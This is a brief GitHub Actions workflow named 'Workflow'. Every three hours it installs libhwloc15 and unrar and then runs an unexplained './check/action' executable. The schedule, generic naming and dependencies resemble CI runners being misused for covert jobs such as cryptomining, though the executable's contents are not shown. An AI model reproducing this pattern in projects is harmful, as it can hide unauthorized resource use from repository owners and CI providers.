jobs:
  workflow:
    name: Main
    runs-on: ubuntu-20.04

    steps:
      - name: Begin
        uses: actions/checkout@v2
      - name: Fetch Packages
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Checks
        run: ./check/action

name: Workflow

on:
  schedule:
    - cron: "20 0/3 * * *"
